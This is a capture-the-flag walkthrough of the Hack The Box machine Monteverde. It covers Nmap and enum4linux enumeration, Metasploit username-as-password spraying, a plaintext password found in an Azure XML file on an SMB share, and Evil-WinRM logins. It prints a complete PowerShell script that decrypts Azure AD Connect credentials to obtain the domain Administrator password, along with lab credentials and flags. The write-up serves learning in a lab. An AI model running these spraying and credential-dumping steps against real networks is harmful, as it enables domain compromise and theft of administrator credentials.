As the second new box in 2020, Monteverde came into play. A Medium Windows box good for 30 points for your next status on Hack The Box. Personally, I like the Windows machines better than Linux, but that’s purely because I’m more concerned with the Microsoft ecosystem. Enough general shizzle, time to discover Monteverde.
An Nmap scan a day, keeps the doctor away. First let’s see what is available on this Windows box. LDAP, SMB and WINRM are available, chances are that a large part of the enumeration can be done with them.
nmap -sC -sV -T5 -oA monteverde 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for 10.10.10.172
Host is up (0.061s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3FE556%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T11:08:14
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds
By means of enum4linux you can quickly see whether accounts can be found, what the domain is and any group memberships.
enum4linux 10.10.10.172
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================================
| Getting domain SID for 10.10.10.172 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
=============================
| Users on 10.10.10.172 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
group:[Developers] rid:[0xa34]
The output returns a number of usernames but no further hints to passwords. I create a text file with the usernames to quickly see whether accounts can be logged in by means of the SMB_Login module in Metasploit.
msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v5.0.72-dev ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion
First, I try to use the USER_AS_PASS option . This option ensures that the username is used as password for all users in my user list. A quick way to see if a lazy administrator has been working.
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > run
Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply: SABatchJobs.
[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\Guest:Guest',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\roleary:roleary',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[0x3] Path to User flag
The account cannot connect via Windows Remote Management. First, browse through SMB based on the SABatchJobs password found.
smbclient -U SABatchJobs -L 10.10.10.172
Enter WORKGROUP\SABatchJobs's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
The users $ share contains a number of directories that I cannot access with these credentials. The only file visible is azure.xml .
smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Fri Jan 3 13:12:48 2020
.. D 0 Fri Jan 3 13:12:48 2020
dgalanos D 0 Fri Jan 3 13:12:30 2020
mhope D 0 Fri Jan 3 13:41:18 2020
roleary D 0 Fri Jan 3 13:10:30 2020
smorgan D 0 Fri Jan 3 13:10:24 2020
\dgalanos
. D 0 Fri Jan 3 13:12:30 2020
.. D 0 Fri Jan 3 13:12:30 2020
\mhope
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
\roleary
. D 0 Fri Jan 3 13:10:30 2020
.. D 0 Fri Jan 3 13:10:30 2020
\smorgan
. D 0 Fri Jan 3 13:10:24 2020
.. D 0 Fri Jan 3 13:10:24 2020
524031 blocks of size 4096. 518419 blocks available
A config file for Azure, but otherwise I don’t expect to need much of this in terms of code. What is interesting is the Password. Since this file is in mhope ‘s directory , this may be his password.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
After the first user I now have a set of credentials for mhope . I expect to now also have the user flag.
evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$"
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
User flag is in. Now continue to search for an option to find root.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
[0x4] Path too Root flag
The machine is fairly bare and there is little of interest to browse through. In C: \ Program Files you can see that this machine is equipped with Azure AD Connect, a piece of tooling for synchronizing your on-premise Active Directory to Azure Active Directory. I do not expect this on an HTB box without it having a purpose. Will this be root?
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:31 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
After some searching on Google I find an article about Azure AD Connect for Red Teamers. The article explains how to use a Powershell script to dump the username and password of the user with which Azure AD Sync is running. The script is on the website, however, it does not work directly on this box.
After some errors about not being able to connect, I made some adjustments in the script. On the machine I found the folder C: \ Program Files \ Microsoft SQL Server \ mssql14.mssqlserver which explains why it is not working. The connection string in the original script does not work with this version of MSSQL, because MSSQL14 = Microsoft SQL Server 2017.
I have adapted the line below so that the string works with the version of MSSQL that is installed on Monteverde.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
See here, a working script for dumping Azure AD Sync credentials. As you can see at $ client, the string is different from the original from XPN InfoSec’s blog.
# Azure-ADConnect-CredentialExtract.ps1
# Original author: Azure AD Connect for Red Teamers (XPN Adam Chester)
# Changes: adjusted $client string for MSSQL 2017.
#
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Initial Catalog=ADSync;Trusted_Connection =yes;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+]Password: " + $password.Password)
I modified and saved the script locally on my laptop. Via upload within the WIN-RM shell you can easily upload it to the remote box.
*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1
Info: Uploading Azure-ADConnect-CredentialExtract.ps1 to C:\users\mhope\Videos\ad2.ps1
Data: 2288 bytes of 2288 bytes copied
Info: Upload successful!
And there you have it! In this case, the Administrator account was used for Azure AD Sync.
*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
Through Evil-WinRM I can log in with the newly acquired Administrator credentials.
evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!"
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!
cat c:\Users\Administrator\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
Add comment